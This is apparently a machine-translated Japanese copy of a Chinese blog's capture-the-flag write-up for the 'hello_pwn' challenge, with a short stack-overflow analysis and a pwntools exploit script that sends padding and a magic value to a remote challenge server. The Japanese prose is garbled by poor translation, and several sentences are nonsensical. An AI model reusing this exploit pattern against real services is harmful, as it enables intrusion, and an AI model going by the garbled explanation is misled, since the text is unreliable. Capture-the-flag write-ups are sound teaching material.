hello_pwn - 過去記事

ファイルのダウンロード:

リンク:https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ
抽出コード:g47i 
 

0x01の。分析

checksec:

64プログラム、オープンNX。

出典:

このプロセスは、この変数の値はちょうどライン上で以下の変数の値を変更する方法を考え、読み取り機能、明らかにスタックオーバーフローの前で、その上にこの番号の後ろ106Cと同じである限り、非常に簡単です。

これら2つの変数の間の差は4に発見されたので、オーバーフロー情報の空隙4つのバイトを充填した場合にのみ、その後数バック充填こと、フラグを取得し、実行するサブ関数とすることができます。

0x02.exp

##!/usr/bin/env python 
from pwn import*

r=remote("111.198.29.45",44362)
#r=process('./hellopwn')

payload=4*'A'+p64(1853186401)

r.recvuntil("bof")
r.sendline(payload)

r.interactive()

 

公開された76元の記事 ウォン称賛82 ビュー7079

おすすめ

転載: blog.csdn.net/ATFWUS/article/details/104591776